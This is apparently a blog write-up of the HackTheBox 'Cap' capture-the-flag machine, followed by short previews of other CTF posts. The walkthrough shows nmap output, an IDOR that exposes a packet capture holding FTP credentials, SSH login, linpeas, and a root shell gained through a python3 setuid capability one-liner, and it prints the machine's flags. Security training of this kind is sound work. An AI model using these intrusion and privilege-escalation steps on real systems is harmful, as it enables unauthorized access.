Cap - HackTheBox

-
htb


What we can learn from this machine

  • Enumeration
  • Python3 Capabilities
  • Wireshark

Always start with nmap scan. Let’s see what we got in machine.

# Nmap 7.91 scan initiated Thu Jun 10 11:37:56 2021 as: nmap -sC -sV -oN Scans/nmap-output 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Thu, 10 Jun 2021 06:20:18 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 10 Jun 2021 06:20:12 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 10 Jun 2021 06:20:13 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, GET, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 10 11:40:21 2021 -- 1 IP address (1 host up) scanned in 145.03 seconds

Looks like we got port 21 ftp, 22 ssh, 80 http are open. Let’s see what in the webpage.

After sometime poking around I found this.

When you first click It’s no records shows us but we change the url bit backward. Like /data/5 -> /data/4 . You can see it changes but no changes yet. When I change into /data/0 it gives me some captures.

After we download that pcap file. You can open it on wireshark and do look around. When I was looking I found this on tcp stream eq 1.

Looks he need enter the password. Let’s see what we got in other packets maybe we can find our password among them. After some time in tcp stream eq 3 I found the password and username.

Let’s login to the FTP port let’s see its working or not.

┌─[visith@parrot][~/CTF/htb/cap]
└──╼ $ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:visith): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 1001     1001       341117 Jun 10 05:54 linpeas.sh
drwxr-xr-x    3 1001     1001         4096 Jun 10 05:54 snap
-r--------    1 1001     1001           33 Jun 10 04:51 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for user.txt (33 bytes).
226 Transfer complete.
33 bytes received in 0.00 secs (685.6715 kB/s)
ftp> exit
221 Goodbye.

We got our user key but we cant get to root through ftp let’s try that SSH port with same credentials.

[][visith@parrot][~/CTF/htb/cap]
└──╼ $ssh nathan@10.10.10.245
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ECDSA) to the list of known hosts.
nathan@10.10.10.245's password: 
Last login: Thu Jun 10 05:53:09 2021 from 10.10.14.76
nathan@cap:~$ ls -la
total 372
drwxr-xr-x 5 nathan nathan   4096 Jun 10 05:55 .
drwxr-xr-x 3 root   root     4096 May 23 19:17 ..
lrwxrwxrwx 1 root   root        9 May 15 21:40 .bash_history -> /dev/null
-rw-r--r-- 1 nathan nathan    220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 nathan nathan   3771 Feb 25  2020 .bashrc
drwx------ 2 nathan nathan   4096 May 23 19:17 .cache
drwx------ 4 nathan nathan   4096 Jun 10 06:38 .gnupg
-rw-r--r-- 1 nathan nathan    807 Feb 25  2020 .profile
lrwxrwxrwx 1 root   root        9 May 27 09:16 .viminfo -> /dev/null
-rwxr-xr-x 1 nathan nathan 341117 Jun 10 05:54 linpeas.sh
drwxr-xr-x 3 nathan nathan   4096 Jun 10 05:54 snap
-r-------- 1 nathan nathan     33 Jun 10 04:51 user.txt
nathan@cap:~$ cat user.txt
ecae44311783c50b26a5691bf7bc687e

Here also you can get the user flag. I try to run sudo -l but we can’t run sudo in here. Let’s run the linpeas.sh.

nathan@cap:~$ sudo -l
[sudo] password for nathan: 
Sorry, user nathan may not run sudo on cap.
nathan@cap:~$ ./linpeas.sh

In linpeas output we can see this under the capabilities.

Python3 can give us root. After searching in GTFObins I find this.

We have python3 we need to change the python version of our script. Like this :

./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

After we execute this script usr/bin directory. We can get our shell to root.

nathan@cap:/usr/bin$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# /usr/bin/script -qc /bin/bash /dev/null
root@cap:/usr/bin# cd /root
root@cap:/root# ls
root.txt  snap
root@cap:/root# cat root.txt
3de419c148d30fbff7975629a16e486e
root@cap:/root#

Thx for reading !!

Popular posts from this blog

Mustacchio - TryHackMe

-
Image
thm What we can learn from this machine : XXE injection Enumerations SUID exploit let’s start with a nmap scan. normal nmap scan found port 80 webserver called Mustacchio and port 22 ssh open running ubuntu. I try to running a full nmap scan for see more ports are open above the port 1000. # Nmap 7.91 scan initiated Sat Jun 12 14:57:25 2021 as: nmap -sC -sV -p- -oN scans/nmap-allports 10.10.236.36 Nmap scan report for 10.10.236.36 Host is up (0.15s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA) | 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA) |_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-t...
Read more

Tech_Supp0rt: 1 - TryHackMe

-
Image
Welcome file Welcome to another CTF-writeup !! Tech_support:1 by vikaran. What we can learn from this machine. nmap scan , smbmap etc. (enumeration skills) subrion cms 4.2.1 RCE iconv sudo permission to overwritten files and read the files Let’s start with enumeration. First with nmap to see what port we have in the box. Nmap scan ┌── ( defalt@kali ) - [ ~/Documents/tryhackme/Tech_Supp0rt:1 ] └─$ nmap -sC -sV 10.10.168.200 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-15 21:29 PDT Nmap scan report for 10.10.168.20 Host is up ( 0.37s latency ) . Not shown: 996 closed tcp ports ( conn-refused ) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 ( Ubuntu Linux ; protocol 2.0 ) | ssh-hostkey: | 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 ( RSA ) | 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c ( ECDSA ) | _ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c ( ED25519 ) 80/tcp open http Apache ht...
Read more

Nmap - TryHackMe!

-
Image
nmap Task 2 What networking constructs are used to direct traffic to the right application on a server? ports How many of these are available on any network-enabled computer? 65535 [Research] How many of these are considered “well-known”? (These are the “standard” numbers mentioned in the task)? 1024 Task 3 What is the first switch listed in the help menu for a ‘Syn Scan’ (more on this later!)? -sS Which switch would you use for a “UDP scan”? -sU If you wanted to detect which operating system the target is running on, which switch would you use? -O Nmap provides a switch to detect the version of the services running on the target. What is this switch? -sV The default output provided by nmap often does not provide enough information for a pentester. How would you increase the verbosity? -v Verbosity level one is good, but verbosity level two is better! How would you set the verbosity level to two? (Note: it’s highly advisable to a...
Read more